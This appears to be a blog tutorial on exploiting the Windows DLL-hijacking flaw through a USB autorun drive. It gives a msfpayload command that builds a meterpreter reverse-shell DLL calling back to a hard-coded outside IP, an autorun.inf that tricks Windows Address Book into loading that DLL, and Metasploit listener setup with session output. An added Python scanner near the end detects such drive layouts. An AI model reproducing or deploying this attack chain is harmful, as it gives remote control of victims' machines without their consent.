Exploit DLL Vulnerability with Autorun and Metasploit on Windows
Introduction
So by now, you guys have probably all heard of the Windows DLL loading (DLL hijacking) vulnerability that was found recently, right? If not, please read this post first: http://greyhat-security.com/40-220-windows-exes-vulnerable-remote-code-e...
Basically, here's what's going to happen in this tutorial: you're going to use Metasploit to generate a reverse_tcp payload as a DLL, and you're also going to create a blank "VCF" file, which is a Windows Address Book (WAB) contact file. We're then going to create an autorun.inf file which gets the USB drive/CD drive to tell WAB to open the blank VCF, and when WAB opens it, it will also load the DLL sitting next to that file (the malicious one you generated beforehand). So let's get to it, hey?
The Good Stuff
Alright, so head on over to your box - I'm going to assume you've installed Metasploit, but if not, please do that first. Then, we need to generate the actual payload:
root@box:~$ msfpayload windows/meterpreter/reverse_tcp LHOST=110.232.114.34 LPORT=4444 D > ./twain.dll
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=110.232.114.34,LPORT=4444
Next, you need to create a blank VCF file. You should already know how to do this, as it's relatively easy, but if not, type this in your Linux command line:
root@box:~$ touch Organisation_Address_Book.vcf
This will create the file "Organisation_Address_Book.vcf" with no contents. The underscores are used instead of spaces so that the file name needs no quoting or escaping, either on the Linux command line or in the autorun.inf OPEN= line below.
Bring those two files over to your flash drive by whatever means you find necessary (SCP, rsync, copy and paste, etc.), then create an "autorun.inf" file in the root of the flash drive with the following contents:
[AutoRun]
OPEN="C:\Program Files\Outlook Express\wab.exe" Organisation_Address_Book.vcf
ACTION=Add Contacts to Address Book
LABEL=Address Book
ICON="C:\Program Files\Outlook Express\wab.exe"
Then, set up your Metasploit to listen for it. So, in msfconsole:
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 584 exploits - 297 auxiliary
+ -- --=[ 219 payloads - 27 encoders - 8 nops
=[ svn r10162 updated today (2010.08.26)
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST <YOUR_IP>
LHOST => <YOUR_IP>
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Started reverse handler on <YOUR_IP>:4444
[*] Starting the payload handler...
Once the handler is waiting like that, insert your flash drive into the target machine and double-click the "Address Book" option when the AutoPlay dialog appears. You should then see the following in msfconsole:
[*] Sending stage (748544 bytes) to <TARGET_IP>
[*] Meterpreter session 1 opened (<YOUR_IP>:4444 -> <TARGET_IP>:30107) at <DATE> <TIME> <TIMEZONE>
Then, the world is your oyster!
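On the defensive side, the staging laid out above (an autorun.inf whose OPEN= line hands a document on the drive to a host program, with a DLL planted beside that document) is easy to spot before a drive is ever plugged into a production box. The following scanner is an added example, not code from the original post: it parses autorun.inf, follows the OPEN=/SHELLEXECUTE= targets, and flags any DLL sitting next to the document being opened. The function names are my own, and the sample drive layout is constructed in a temporary directory.

```python
import os
import re
import tempfile
LAUNCH_KEYS = ("open", "shellexecute")  # autorun.inf keys that start a program

def parse_autorun(text):
    """Return {key: value} from the [autorun] section, keys lowercased."""
    entries, in_autorun = {}, False
    for line in (raw.strip() for raw in text.splitlines()):
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_autorun = line[1:-1].strip().lower() == "autorun"
        elif in_autorun and "=" in line:
            key, _, value = line.partition("=")
            entries[key.strip().lower()] = value.strip()
    return entries

def split_command(value):  # '"C:\\x\\wab.exe" a.vcf' -> ['C:\\x\\wab.exe', 'a.vcf']
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', value)]

def assess_drive(root):
    """Return finding strings for the drive rooted at `root` (empty list = clean)."""
    inf = os.path.join(root, "autorun.inf")
    if not os.path.isfile(inf):
        return []
    with open(inf, encoding="latin-1") as fh:
        entries = parse_autorun(fh.read())
    findings = []
    for key in LAUNCH_KEYS:
        if not (tokens := split_command(entries.get(key, ""))):
            continue
        exe, args = tokens[0], tokens[1:]
        findings.append(f"{key}= launches {exe}")
        for arg in args:  # documents on the drive handed to that program
            doc = os.path.join(root, arg.replace("\\", os.sep))
            if os.path.isfile(doc) and (dlls := [f for f in os.listdir(os.path.dirname(doc))
                                                 if f.lower().endswith(".dll")]):
                findings.append(f"{dlls} planted beside {arg}, which {key}= hands to {exe}")
    return findings

def build_sample_drive():
    """Constructed stand-in for the flash drive laid out in the post (temp dir)."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "autorun.inf"), "w") as fh:
        fh.write('[AutoRun]\nOPEN="C:\\Program Files\\Outlook Express\\wab.exe" '
                 'Organisation_Address_Book.vcf\nACTION=Add Contacts to Address Book\n')
    for name in ("Organisation_Address_Book.vcf", "twain.dll"):  # empty placeholder files
        open(os.path.join(root, name), "w").close()
    return root
```

Point assess_drive() at the root of a mounted drive to check it; the same DLL-beside-document check applies to any document a host program is launched with, not only VCF files.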

The Conclusion
So, as you can see, there are a great many possibilities from this recent DLL exploit discovery. So many applications are vulnerable, from uTorrent to Thunderbird to IE, etc. It's infinite (theoretically), and can be used quite successfully in penetration tests for some time to come. Enjoy!